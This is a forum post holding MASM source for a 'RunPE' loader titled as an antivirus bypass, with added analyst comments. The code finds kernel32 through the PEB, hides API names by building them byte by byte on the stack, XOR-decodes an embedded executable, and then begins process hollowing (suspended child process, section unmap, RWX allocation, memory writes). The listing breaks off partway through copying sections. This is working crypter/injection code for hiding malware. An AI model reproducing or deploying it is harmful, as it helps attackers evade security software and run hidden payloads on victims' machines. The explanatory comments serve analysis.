Underc0de
Programación General => ASM => Mensaje iniciado por: ragaza en Abril 04, 2018, 06:01:24 AM
Código:
.386
.model flat,stdcall
Comment *
[ RunPE ShellCode Bypass AV ] - {Private}
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
[ 2010 - 2011 ]
[Skype : coldzer01 ] - [Yahoo : [email protected] ]
[ Home : www.at4re.com - www.mtcoders.com ]
{
Usage : [Delphi]
Make Var with
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
#### then in code call it like this #########
Begin
RunPE := @ShellCode[1];
RunPE(@TextFile[1],length(TextFile));
end;
}
*
.code
; Entry point of a position-independent 32-bit Windows routine (MASM, flat model).
; Per the usage note in the header comment it is called as a stdcall procedure:
;   [EBP+8]   = Buffer    (pointer to the encoded PE image)
;   [EBP+0Ch] = BufferLen (length of that buffer in bytes)
; The final RETN 8 matches those two DWORD arguments.
; The listing declares no imports; every API it uses is located at run time from
; loader structures. Analyst note: static import analysis of a host binary will
; therefore not show the process-manipulation APIs used further down.
start:
; Standard frame; 378h bytes of locals hold the name strings, a path buffer,
; STARTUPINFO / PROCESS_INFORMATION and a thread CONTEXT (see the offsets used later).
PUSH EBP
MOV EBP,ESP
ADD ESP,-0378h
; EBX/ESI/EDI are saved here and restored before RETN.
PUSH EBX
PUSH ESI
PUSH EDI
; ASSUME FS:NOTHING lets MASM accept the FS-relative operand below.
ASSUME FS:NOTHING
; FS:[30h] is the PEB pointer in 32-bit user mode. The two +0Ch loads follow
; PEB.Ldr and then the head of the load-order module list; the two plain [EAX]
; loads follow the forward link twice, landing on the third list entry.
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
; Offset 28h of the list entry is the buffer pointer of the module's full path
; (a UTF-16 string).
MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
;################# Extract Module Name [UNICODE] ####################
; The flags set by this TEST are not consumed by any branch that follows.
TEST EAX,EAX
; AG: advance two bytes at a time until the 16-bit NUL terminator of the path.
AG:
MOV CX,WORD PTR DS:[EAX]
CMP CX,00h
JE OK
INC EAX
INC EAX
JMP AG
; OK: step backwards two bytes at a time until a backslash (5Ch) is found.
; There is no lower bound on this backwards scan in the listing.
OK:
DEC EAX
DEC EAX
MOV CX,WORD PTR DS:[EAX]
CMP CX,5Ch ; '\'
JE OK2
JMP OK
; OK2: skip the backslash so EAX points at the file-name part of the path.
OK2:
INC EAX
INC EAX
;################# Extract Module Name ####################
;################# Convert to UpperCase ####################
; In: EAX = pointer to the UTF-16 file name found by the preceding scan.
; If the first character is below 61h ('a') the conversion is skipped entirely.
; Otherwise the loop rewrites characters in place, i.e. it modifies the loader's
; own copy of the module path string.
; NOTE(review): this block has no counterpart in the Delphi byte array printed
; below the listing, which goes straight from the two INC EAX instructions to the
; "KERNEL32" comparison; the two forms of the code on this page are not identical.
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h
JS CHK
; Start one character before the name; EDI counts the characters processed.
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
; Characters below 39h are stored unchanged; all others have 20h subtracted.
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
; Loop ends once the value just stored is 0.
CMP CX,0
JNE UP
; Rewind EAX by 2*EDI bytes, back to the position where the loop started.
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################
;################# Check Module Name [Kernel32 [UNICODE]] ######################
; In: EAX = pointer to a UTF-16 module file name.
; Compares the first eight characters, one at a time, with "KERNEL32"
; (4Bh 45h 52h 4Eh 45h 4Ch 33h 32h). Any mismatch jumps to AV.
; Out (at GO): EAX = DllBase (+18h) of the list entry chosen as kernel32.
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]
CMP ECX,4Ch ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h ; 2
JNZ AV
;********* Normal Mode *******
; Name matched: repeat the same walk (PEB -> Ldr -> load-order list, two forward
; links) and take the module base at +18h of the third entry.
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX+18h]
JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
; Name did not match: follow one additional forward link and take the base of the
; fourth entry instead. Per the author's comments this assumes another module
; (attributed to an AV product) occupies the earlier slot. The name of that fourth
; entry is not checked; its base is used as-is.
AV:
ASSUME FS:NOTHING
MOV EAX,DWORD PTR FS:[30h]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX+0Ch]
MOV EAX,DWORD PTR DS:[EAX]
MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
MOV EAX,DWORD PTR DS:[EAX+18h]
;################# Check Module Name ######################
; GO: manual export-table lookup in the module whose base is in EAX.
; In:  EAX = module base selected by the preceding name check.
; Out: [EBP-4h]  = that module base (used by every later lookup),
;      [EBP-14h] = address of the export whose name has 'G' at index 0, 'P' at
;                  index 3 and 'A' at index 7 (the pattern of "GetProcAddress"),
;                  or 0 if no name matched.
; Analyst note: only three characters are compared, so the match is a pattern,
; not a full string or hash comparison.
GO:
MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
; The three pattern bytes 'G' (47h), 'P' (50h), 'A' (41h).
MOV BYTE PTR SS:[EBP-28h],47h
MOV BYTE PTR SS:[EBP-27h],50h
MOV BYTE PTR SS:[EBP-26h],41h
; Result slot starts as 0.
XOR EAX,EAX
MOV DWORD PTR SS:[EBP-14h],EAX
; base+3Ch is e_lfanew; EAX becomes the address of the NT headers.
MOV EAX,DWORD PTR SS:[EBP-4h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
; NT headers +78h / +7Ch: RVA and size of the export directory (32-bit PE).
MOV EDX,DWORD PTR DS:[EAX+78h]
MOV DWORD PTR SS:[EBP-44h],EDX
MOV EDX,DWORD PTR DS:[EAX+7Ch]
MOV DWORD PTR SS:[EBP-40h],EDX
; EAX = address of the export directory; +18h is NumberOfNames.
MOV EAX,DWORD PTR SS:[EBP-4h]
ADD EAX,DWORD PTR SS:[EBP-44h]
MOV ESI,DWORD PTR DS:[EAX+18h]
DEC ESI
; TEST clears CF, so the JB below is not taken.
TEST ESI,ESI
JB LoadAPI
INC ESI
; EDX = name index, ESI = names remaining.
XOR EDX,EDX
LoopAPI:
; ECX = base + AddressOfNames (+20h) + EDX*4.
MOV ECX,DWORD PTR DS:[EAX+20h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
SHL EBX,2h
ADD ECX,EBX
; The name RVA is read at +0Ch from that slot, i.e. from entry EDX+3.
MOV EDI,DWORD PTR DS:[ECX+0Ch]
ADD EDI,DWORD PTR SS:[EBP-4h]
; Compare name[0], name[3], name[7] with the stored 'G', 'P', 'A'.
MOV BL,BYTE PTR DS:[EDI]
CMP BL,BYTE PTR SS:[EBP-28h]
JNZ CheckAPI
MOV BL,BYTE PTR DS:[EDI+3h]
CMP BL,BYTE PTR SS:[EBP-27h]
JNZ CheckAPI
MOV CL,BYTE PTR DS:[EDI+7h]
CMP CL,BYTE PTR SS:[EBP-26h]
JNZ CheckAPI
; Match: read the 16-bit ordinal at AddressOfNameOrdinals (+24h) slot EDX and
; add 3 to its value.
MOV ECX,DWORD PTR DS:[EAX+24h]
ADD ECX,DWORD PTR SS:[EBP-4h]
MOV EBX,EDX
ADD EBX,EBX
ADD ECX,EBX
MOV CX,WORD PTR DS:[ECX]
ADD CX,3h
; Index AddressOfFunctions (+1Ch) with that value and convert the RVA to an address.
MOV EAX,DWORD PTR DS:[EAX+1Ch]
ADD EAX,DWORD PTR SS:[EBP-4h]
MOVZX ECX,CX
SHL ECX,2h
ADD EAX,ECX
MOV ESI,DWORD PTR DS:[EAX]
ADD ESI,DWORD PTR SS:[EBP-4h]
MOV DWORD PTR SS:[EBP-14h],ESI
JMP LoadAPI
; No match: next name. If the names run out, [EBP-14h] is still 0 and is
; nevertheless called later in the listing without a check.
CheckAPI:
INC EDX
DEC ESI
JNZ LoopAPI
; LoadAPI: builds thirteen NUL-terminated ASCII strings on the stack, one byte per
; instruction. No API is called in this block; the strings are consumed later as
; name arguments to the pointers held in [EBP-14h] and [EBP-18h].
; Analyst note: because each character is an immediate operand of its own MOV,
; these names do not appear as contiguous text in the assembled bytes, so a plain
; string search over the binary will not list them; tooling that reconstructs
; stack-built strings, or emulation, recovers them.
LoadAPI: ; [ Write API To An Pointer - use later ]
; [EBP-69h] = "GetModuleHandleA"
MOV BYTE PTR SS:[EBP-69h],47h
MOV BYTE PTR SS:[EBP-68h],65h
MOV BYTE PTR SS:[EBP-67h],74h
MOV BYTE PTR SS:[EBP-66h],4Dh
MOV BYTE PTR SS:[EBP-65h],6Fh
MOV BYTE PTR SS:[EBP-64h],64h
MOV BYTE PTR SS:[EBP-63h],75h
MOV BYTE PTR SS:[EBP-62h],6Ch
MOV BYTE PTR SS:[EBP-61h],65h
MOV BYTE PTR SS:[EBP-60h],48h
MOV BYTE PTR SS:[EBP-5Fh],61h
MOV BYTE PTR SS:[EBP-5Eh],6Eh
MOV BYTE PTR SS:[EBP-5Dh],64h
MOV BYTE PTR SS:[EBP-5Ch],6Ch
MOV BYTE PTR SS:[EBP-5Bh],65h
MOV BYTE PTR SS:[EBP-5Ah],41h
MOV BYTE PTR SS:[EBP-59h],0h
; [EBP-7Ch] = "GetModuleFileNameA"
MOV BYTE PTR SS:[EBP-7Ch],47h
MOV BYTE PTR SS:[EBP-7Bh],65h
MOV BYTE PTR SS:[EBP-7Ah],74h
MOV BYTE PTR SS:[EBP-79h],4Dh
MOV BYTE PTR SS:[EBP-78h],6Fh
MOV BYTE PTR SS:[EBP-77h],64h
MOV BYTE PTR SS:[EBP-76h],75h
MOV BYTE PTR SS:[EBP-75h],6Ch
MOV BYTE PTR SS:[EBP-74h],65h
MOV BYTE PTR SS:[EBP-73h],46h
MOV BYTE PTR SS:[EBP-72h],69h
MOV BYTE PTR SS:[EBP-71h],6Ch
MOV BYTE PTR SS:[EBP-70h],65h
MOV BYTE PTR SS:[EBP-6Fh],4Eh
MOV BYTE PTR SS:[EBP-6Eh],61h
MOV BYTE PTR SS:[EBP-6Dh],6Dh
MOV BYTE PTR SS:[EBP-6Ch],65h
MOV BYTE PTR SS:[EBP-6Bh],41h
MOV BYTE PTR SS:[EBP-6Ah],0h
; [EBP-91h] = "ZwUnmapViewOfSection"
MOV BYTE PTR SS:[EBP-91h],5Ah
MOV BYTE PTR SS:[EBP-90h],77h
MOV BYTE PTR SS:[EBP-8Fh],55h
MOV BYTE PTR SS:[EBP-8Eh],6Eh
MOV BYTE PTR SS:[EBP-8Dh],6Dh
MOV BYTE PTR SS:[EBP-8Ch],61h
MOV BYTE PTR SS:[EBP-8Bh],70h
MOV BYTE PTR SS:[EBP-8Ah],56h
MOV BYTE PTR SS:[EBP-89h],69h
MOV BYTE PTR SS:[EBP-88h],65h
MOV BYTE PTR SS:[EBP-87h],77h
MOV BYTE PTR SS:[EBP-86h],4Fh
MOV BYTE PTR SS:[EBP-85h],66h
MOV BYTE PTR SS:[EBP-84h],53h
MOV BYTE PTR SS:[EBP-83h],65h
MOV BYTE PTR SS:[EBP-82h],63h
MOV BYTE PTR SS:[EBP-81h],74h
MOV BYTE PTR SS:[EBP-80h],69h
MOV BYTE PTR SS:[EBP-7Fh],6Fh
MOV BYTE PTR SS:[EBP-7Eh],6Eh
MOV BYTE PTR SS:[EBP-7Dh],0h
; [EBP-0A0h] = "VirtualAllocEx"
MOV BYTE PTR SS:[EBP-0A0h],56h
MOV BYTE PTR SS:[EBP-9Fh],69h
MOV BYTE PTR SS:[EBP-9Eh],72h
MOV BYTE PTR SS:[EBP-9Dh],74h
MOV BYTE PTR SS:[EBP-9Ch],75h
MOV BYTE PTR SS:[EBP-9Bh],61h
MOV BYTE PTR SS:[EBP-9Ah],6Ch
MOV BYTE PTR SS:[EBP-99h],41h
MOV BYTE PTR SS:[EBP-98h],6Ch
MOV BYTE PTR SS:[EBP-97h],6Ch
MOV BYTE PTR SS:[EBP-96h],6Fh
MOV BYTE PTR SS:[EBP-95h],63h
MOV BYTE PTR SS:[EBP-94h],45h
MOV BYTE PTR SS:[EBP-93h],78h
MOV BYTE PTR SS:[EBP-92h],0h
; [EBP-0B1h] = "VirtualProtectEx"
MOV BYTE PTR SS:[EBP-0B1h],56h
MOV BYTE PTR SS:[EBP-0B0h],69h
MOV BYTE PTR SS:[EBP-0AFh],72h
MOV BYTE PTR SS:[EBP-0AEh],74h
MOV BYTE PTR SS:[EBP-0ADh],75h
MOV BYTE PTR SS:[EBP-0ACh],61h
MOV BYTE PTR SS:[EBP-0ABh],6Ch
MOV BYTE PTR SS:[EBP-0AAh],50h
MOV BYTE PTR SS:[EBP-0A9h],72h
MOV BYTE PTR SS:[EBP-0A8h],6Fh
MOV BYTE PTR SS:[EBP-0A7h],74h
MOV BYTE PTR SS:[EBP-0A6h],65h
MOV BYTE PTR SS:[EBP-0A5h],63h
MOV BYTE PTR SS:[EBP-0A4h],74h
MOV BYTE PTR SS:[EBP-0A3h],45h
MOV BYTE PTR SS:[EBP-0A2h],78h
MOV BYTE PTR SS:[EBP-0A1h],0h
; [EBP-0C3h] = "ReadProcessMemory"
MOV BYTE PTR SS:[EBP-0C3h],52h
MOV BYTE PTR SS:[EBP-0C2h],65h
MOV BYTE PTR SS:[EBP-0C1h],61h
MOV BYTE PTR SS:[EBP-0C0h],64h
MOV BYTE PTR SS:[EBP-0BFh],50h
MOV BYTE PTR SS:[EBP-0BEh],72h
MOV BYTE PTR SS:[EBP-0BDh],6Fh
MOV BYTE PTR SS:[EBP-0BCh],63h
MOV BYTE PTR SS:[EBP-0BBh],65h
MOV BYTE PTR SS:[EBP-0BAh],73h
MOV BYTE PTR SS:[EBP-0B9h],73h
MOV BYTE PTR SS:[EBP-0B8h],4Dh
MOV BYTE PTR SS:[EBP-0B7h],65h
MOV BYTE PTR SS:[EBP-0B6h],6Dh
MOV BYTE PTR SS:[EBP-0B5h],6Fh
MOV BYTE PTR SS:[EBP-0B4h],72h
MOV BYTE PTR SS:[EBP-0B3h],79h
MOV BYTE PTR SS:[EBP-0B2h],0h
; [EBP-0D6h] = "WriteProcessMemory"
MOV BYTE PTR SS:[EBP-0D6h],57h
MOV BYTE PTR SS:[EBP-0D5h],72h
MOV BYTE PTR SS:[EBP-0D4h],69h
MOV BYTE PTR SS:[EBP-0D3h],74h
MOV BYTE PTR SS:[EBP-0D2h],65h
MOV BYTE PTR SS:[EBP-0D1h],50h
MOV BYTE PTR SS:[EBP-0D0h],72h
MOV BYTE PTR SS:[EBP-0CFh],6Fh
MOV BYTE PTR SS:[EBP-0CEh],63h
MOV BYTE PTR SS:[EBP-0CDh],65h
MOV BYTE PTR SS:[EBP-0CCh],73h
MOV BYTE PTR SS:[EBP-0CBh],73h
MOV BYTE PTR SS:[EBP-0CAh],4Dh
MOV BYTE PTR SS:[EBP-0C9h],65h
MOV BYTE PTR SS:[EBP-0C8h],6Dh
MOV BYTE PTR SS:[EBP-0C7h],6Fh
MOV BYTE PTR SS:[EBP-0C6h],72h
MOV BYTE PTR SS:[EBP-0C5h],79h
MOV BYTE PTR SS:[EBP-0C4h],0h
; [EBP-0E7h] = "GetThreadContext"
MOV BYTE PTR SS:[EBP-0E7h],47h
MOV BYTE PTR SS:[EBP-0E6h],65h
MOV BYTE PTR SS:[EBP-0E5h],74h
MOV BYTE PTR SS:[EBP-0E4h],54h
MOV BYTE PTR SS:[EBP-0E3h],68h
MOV BYTE PTR SS:[EBP-0E2h],72h
MOV BYTE PTR SS:[EBP-0E1h],65h
MOV BYTE PTR SS:[EBP-0E0h],61h
MOV BYTE PTR SS:[EBP-0DFh],64h
MOV BYTE PTR SS:[EBP-0DEh],43h
MOV BYTE PTR SS:[EBP-0DDh],6Fh
MOV BYTE PTR SS:[EBP-0DCh],6Eh
MOV BYTE PTR SS:[EBP-0DBh],74h
MOV BYTE PTR SS:[EBP-0DAh],65h
MOV BYTE PTR SS:[EBP-0D9h],78h
MOV BYTE PTR SS:[EBP-0D8h],74h
MOV BYTE PTR SS:[EBP-0D7h],0h
; [EBP-0F8h] = "SetThreadContext"
MOV BYTE PTR SS:[EBP-0F8h],53h
MOV BYTE PTR SS:[EBP-0F7h],65h
MOV BYTE PTR SS:[EBP-0F6h],74h
MOV BYTE PTR SS:[EBP-0F5h],54h
MOV BYTE PTR SS:[EBP-0F4h],68h
MOV BYTE PTR SS:[EBP-0F3h],72h
MOV BYTE PTR SS:[EBP-0F2h],65h
MOV BYTE PTR SS:[EBP-0F1h],61h
MOV BYTE PTR SS:[EBP-0F0h],64h
MOV BYTE PTR SS:[EBP-0EFh],43h
MOV BYTE PTR SS:[EBP-0EEh],6Fh
MOV BYTE PTR SS:[EBP-0EDh],6Eh
MOV BYTE PTR SS:[EBP-0ECh],74h
MOV BYTE PTR SS:[EBP-0EBh],65h
MOV BYTE PTR SS:[EBP-0EAh],78h
MOV BYTE PTR SS:[EBP-0E9h],74h
MOV BYTE PTR SS:[EBP-0E8h],0h
; [EBP-0105h] = "ResumeThread"
MOV BYTE PTR SS:[EBP-0105h],52h
MOV BYTE PTR SS:[EBP-0104h],65h
MOV BYTE PTR SS:[EBP-0103h],73h
MOV BYTE PTR SS:[EBP-0102h],75h
MOV BYTE PTR SS:[EBP-0101h],6Dh
MOV BYTE PTR SS:[EBP-0100h],65h
MOV BYTE PTR SS:[EBP-0FFh],54h
MOV BYTE PTR SS:[EBP-0FEh],68h
MOV BYTE PTR SS:[EBP-0FDh],72h
MOV BYTE PTR SS:[EBP-0FCh],65h
MOV BYTE PTR SS:[EBP-0FBh],61h
MOV BYTE PTR SS:[EBP-0FAh],64h
MOV BYTE PTR SS:[EBP-0F9h],0h
; [EBP-01Eh] = "ntdll"
MOV BYTE PTR SS:[EBP-01Eh],6Eh
MOV BYTE PTR SS:[EBP-01Dh],74h
MOV BYTE PTR SS:[EBP-01Ch],64h
MOV BYTE PTR SS:[EBP-01Bh],6Ch
MOV BYTE PTR SS:[EBP-01Ah],6Ch
MOV BYTE PTR SS:[EBP-019h],0h
; [EBP-0114h] = "CreateProcessA"
MOV BYTE PTR SS:[EBP-0114h],43h
MOV BYTE PTR SS:[EBP-0113h],72h
MOV BYTE PTR SS:[EBP-0112h],65h
MOV BYTE PTR SS:[EBP-0111h],61h
MOV BYTE PTR SS:[EBP-0110h],74h
MOV BYTE PTR SS:[EBP-010Fh],65h
MOV BYTE PTR SS:[EBP-010Eh],50h
MOV BYTE PTR SS:[EBP-010Dh],72h
MOV BYTE PTR SS:[EBP-010Ch],6Fh
MOV BYTE PTR SS:[EBP-010Bh],63h
MOV BYTE PTR SS:[EBP-010Ah],65h
MOV BYTE PTR SS:[EBP-109h],73h
MOV BYTE PTR SS:[EBP-108h],73h
MOV BYTE PTR SS:[EBP-107h],41h
MOV BYTE PTR SS:[EBP-0106h],0h
; [EBP-121h] = "LoadLibraryA"
MOV BYTE PTR SS:[EBP-121h],4Ch
MOV BYTE PTR SS:[EBP-120h],6Fh
MOV BYTE PTR SS:[EBP-11Fh],61h
MOV BYTE PTR SS:[EBP-11Eh],64h
MOV BYTE PTR SS:[EBP-11Dh],4Ch
MOV BYTE PTR SS:[EBP-11Ch],69h
MOV BYTE PTR SS:[EBP-11Bh],62h
MOV BYTE PTR SS:[EBP-11Ah],72h
MOV BYTE PTR SS:[EBP-119h],61h
MOV BYTE PTR SS:[EBP-118h],72h
MOV BYTE PTR SS:[EBP-117h],79h
MOV BYTE PTR SS:[EBP-116h],41h
MOV BYTE PTR SS:[EBP-115h],0h
; Resolve the name stored at [EBP-121h] ("LoadLibraryA") by calling the pointer in
; [EBP-14h] with (module base at [EBP-4h], name); the result is kept in [EBP-18h].
; [EBP-14h] is the export found by the 'G'/'P'/'A' pattern search earlier in the
; listing, used here with GetProcAddress's (hModule, lpProcName) argument order.
; The pointer is called without checking that the search succeeded.
LEA EAX,DWORD PTR SS:[EBP-121h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-18h],EAX
; Decode the caller's buffer in place.
; ESI = BufferLen ([EBP+0Ch]); the loop is skipped when BufferLen-1 is negative.
MOV ESI,DWORD PTR SS:[EBP+0Ch]
DEC ESI
TEST ESI,ESI
JL CheckLen
INC ESI
; EBX = byte index into Buffer ([EBP+8h]).
XOR EBX,EBX
; Each byte is XORed with 2Ah and then 87h. Analyst note: two constant XORs are
; equivalent to one XOR with 0ADh (2Ah XOR 87h), which is the value needed to
; recover an embedded payload from a sample built with these keys.
DeCryptPE:
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV AL,BYTE PTR DS:[EAX+EBX]
XOR AL,2Ah ; XOR Key 1 [ You Can Change It But Should Crypt the File with the New Keys ]
XOR AL,87h ; XOR Key 2
MOV EDX,DWORD PTR SS:[EBP+8h]
MOV BYTE PTR DS:[EDX+EBX],AL
INC EBX
DEC ESI
JNZ DeCryptPE
; CheckLen: first half of a process-hollowing sequence (MITRE ATT&CK T1055.012):
; start a suspended copy of the current executable, capture its main thread
; context, read its image base from its PEB and unmap that image.
; Every API below is resolved by calling the pointer in [EBP-14h] with
; (module base [EBP-4h], stack-built name); none of the return values is checked.
; Analyst note: a process created suspended by its own image, followed by a
; section unmap in that child, is the observable behaviour of this block.
CheckLen:
; [EBP-54h] = pointer to the (now decoded) buffer from [EBP+8h].
MOV EAX,DWORD PTR SS:[EBP+8h]
MOV DWORD PTR SS:[EBP-54h],EAX
; EBX = address resolved for "GetModuleHandleA" ([EBP-69h]).
LEA EAX,DWORD PTR SS:[EBP-69h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; ESI = address resolved for "GetModuleFileNameA" ([EBP-7Ch]).
LEA EAX,DWORD PTR SS:[EBP-7Ch]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV ESI,EAX
; GetModuleFileNameA(GetModuleHandleA(NULL), [EBP-375h], 105):
; the path of the current executable is written to the buffer at [EBP-375h].
PUSH 105
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0h
CALL EBX
PUSH EAX
CALL ESI
; Zero 44h bytes at [EBP-184h] (indices 43h down to 0) and store 44h in the first
; DWORD: a zeroed STARTUPINFO-sized structure with its size field set.
LEA EAX,DWORD PTR SS:[EBP-184h]
MOV EBX,43h
GetS4C:
MOV BYTE PTR DS:[EAX+EBX],0h
DEC EBX
CMP EBX,-1h
JNZ GetS4C
MOV DWORD PTR SS:[EBP-184h],44h
; EBX = address resolved for "CreateProcessA" ([EBP-114h]).
LEA EAX,DWORD PTR SS:[EBP-114h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; Ten arguments pushed right to left: process-information output at [EBP-140h],
; startup info at [EBP-184h], two NULLs, creation flags 4 (CREATE_SUSPENDED),
; three zeros, command line = own path at [EBP-375h], application name NULL.
; After the call [EBP-140h] is used as the process handle and [EBP-13Ch] as the
; thread handle.
LEA EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-184h]
PUSH EAX
PUSH 0h
PUSH 0h
PUSH 4h
PUSH 0h
PUSH 0h
PUSH 0h
LEA EAX,DWORD PTR SS:[EBP-375h]
PUSH EAX
PUSH 0
CALL EBX
; EBX = address resolved for "GetThreadContext" ([EBP-0E7h]).
LEA EAX,DWORD PTR SS:[EBP-0E7h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; CONTEXT structure at [EBP-250h]; first DWORD (ContextFlags) = 10007h.
; GetThreadContext(thread handle [EBP-13Ch], &context).
MOV DWORD PTR SS:[EBP-250h],10007h
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
; EBX = address resolved for "ReadProcessMemory" ([EBP-0C3h]).
LEA EAX,DWORD PTR SS:[EBP-0C3h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; Read 4 bytes from (context value at [EBP-1ACh]) + 8 in the child into [EBP-38h].
; [EBP-1ACh] is offset 0A4h of the CONTEXT at [EBP-250h], the Ebx slot in the
; 32-bit layout; the listing treats it as the child's PEB address, where +8 is
; the image base field.
LEA EAX,DWORD PTR SS:[EBP-30h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
; Call [EBP-18h] (resolved earlier for "LoadLibraryA") with "ntdll" ([EBP-1Eh]),
; then resolve "ZwUnmapViewOfSection" ([EBP-91h]) in the returned module.
LEA EAX,DWORD PTR SS:[EBP-91h]
PUSH EAX
LEA EAX,DWORD PTR SS:[EBP-1Eh]
PUSH EAX
CALL DWORD PTR SS:[EBP-18h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; ZwUnmapViewOfSection(process handle, image base just read from the child).
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
; Second half of the hollowing sequence: allocate memory in the suspended child
; and copy the decoded PE image into it, headers first and then section by section.
; Locals used: [EBP-54h] decoded buffer, [EBP-2Ch] its NT headers, [EBP-38h] base
; address in the child, [EBP-140h] child process handle, [EBP-4h] module base for
; name lookups via the pointer in [EBP-14h]. Header fields of the buffer are used
; as read; the listing performs no validation of them and checks no return value.
; Analyst note: the allocation below requests protection 40h
; (PAGE_EXECUTE_READWRITE) in another process, and the child's in-memory image no
; longer corresponds to its file on disk once the writes complete.
; [EBP-2Ch] = buffer + e_lfanew (buffer+3Ch) = NT headers of the payload.
MOV EAX,DWORD PTR SS:[EBP-54h]
MOV EAX,DWORD PTR DS:[EAX+3Ch]
ADD EAX,DWORD PTR SS:[EBP-54h]
MOV DWORD PTR SS:[EBP-2Ch],EAX
; EBX = address resolved for "VirtualAllocEx" ([EBP-0A0h]).
LEA EAX,DWORD PTR SS:[EBP-0A0h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; VirtualAllocEx(process, address = NT+34h (ImageBase), size = NT+50h
; (SizeOfImage), 3000h (MEM_COMMIT|MEM_RESERVE), 40h). Result -> [EBP-38h].
PUSH 40h
PUSH 3000h
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+50h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL EBX
MOV DWORD PTR SS:[EBP-38h],EAX
; [EBP-0Ch] = address resolved for "WriteProcessMemory" ([EBP-0D6h]).
LEA EAX,DWORD PTR SS:[EBP-0D6h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-0Ch],EAX
; Write the PE headers: NT+54h (SizeOfHeaders) bytes from the buffer to the
; allocated base; bytes-written output goes to [EBP-34h].
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
; EDI = NT+18h + SizeOfOptionalHeader (word at NT+14h) = first section header.
MOV EAX,DWORD PTR SS:[EBP-2Ch]
LEA EDI,DWORD PTR DS:[EAX+18h]
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX EAX,WORD PTR DS:[EAX+14h]
ADD EDI,EAX
